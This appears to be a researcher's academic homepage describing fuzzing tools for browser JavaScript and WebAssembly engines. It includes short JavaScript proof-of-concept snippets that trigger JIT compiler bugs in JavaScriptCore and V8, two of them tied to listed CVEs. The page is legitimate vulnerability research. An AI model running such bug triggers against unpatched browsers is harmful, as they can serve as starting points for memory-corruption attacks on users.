Xiangwei Zhang

Xiangwei Zhang

Tianjin University, Master Tianjin University, Bachelor

PROJECTS

UNDERWAY

FINISHED

WasmCFuzz: Structure-aware Fuzzing for Wasm Compilers

Recently, I’ve turned my attention to WebAssembly, which I think has a lot of potential and is now supported by all major browsers. I have implemented a generation-based fuzzer based on the file structure of wasm binary to fuzz the WebAssembly compiler of browsers.

My tool has found 9 and 3 WebAssembly-related bugs in JavaScriptCore and SpiderMonkey, respectively.

The workflow of WasmCFuzz: The workflow of PatchFuzz.

PatchFuzz: Patch Fuzzing for JavaScript Engines

PatchFuzz: I am a major contributor to this project, and the code will be available to the public after the paper has been accepted.

The workflow of PatchFuzz: The workflow of PatchFuzz.

Here are two bugs to share:

CVE-2020-9983CVE-2020-9802
const ITERATIONS=1000000;
function f(n){
	n&=0xffffffff
	if(n<-1){
		let v=(-n)&0xffffffff;
		let i=Math.abs(n);
		let arr=new Array(10);
		arr.fill(42.42);
		if(i<arr.length){
			return arr[i];
		}
	}
}
for(let i=0;i<ITERATIONS;i++){
	let isLastIteration=
		i==ITERATIONS-1;
	let n=-(i%10);
	if(isLastIteration){
		n=-2147483648;
	}
	f(n);
}

const ITERATIONS=1000000;
function f(n){
	n&=0xffffffff-1
	if(n<-1){
		let v=(-n)&0xffffffff;
		let i=Math.abs(n);
		let arr=new Array(10);
		arr.fill(42.42);
		if(i<arr.length){
			return arr[i];
		}
	}
}
for(let i=0;i<ITERATIONS;i++){
	let isLastIteration=
		i==ITERATIONS-1;
	let n=-(i%10);
	if(isLastIteration){
		n=-2147483648;
	}
	f(n);
}

FuzzJIT: Oracle-Enhanced Fuzzing for JavaScript Engine JIT Compiler

FuzzJIT: It is a fuzzing tool for JavaScript engines JIT compiler, built on top of Fuzzilli. I was the only student involved in this project. The main contributors to this work are my mentor and zhiyi. I was responsible for the calculation of some evaluative metrics, such as code coverage. I also used FuzzJIT to find several interesting logic bugs.

The workflow of FuzzJIT: The workflow of FuzzJIT.

Here are two bugs to share:

  1. v8_unsigned_number_optimization (I forgot to submit it.)
    function opt(){
 var a=new Float32Array(3300000000);
 a[-1000000000]=666;
 var b=a[-1000000000];
 var c=a[3294967296];// -1000000000 = u3294967296
 for(let i=1;i<1000;i++){
 }
 return c;
}
opt();
print(opt()); // output: 0
%OptimizeFunctionOnNextCall(opt);
print(opt()); // output: 666
  2. jsc_issue_228068
    function opt() {
return parseInt ("−0");
}
let r1 = opt() ;
print (Object. is(r1 , −0)); // output : True
for ( let i = 0; i < 1000; i++) {
opt() ;
}
let r2 = opt() ;
print (Object. is(r2 , −0)); // output : False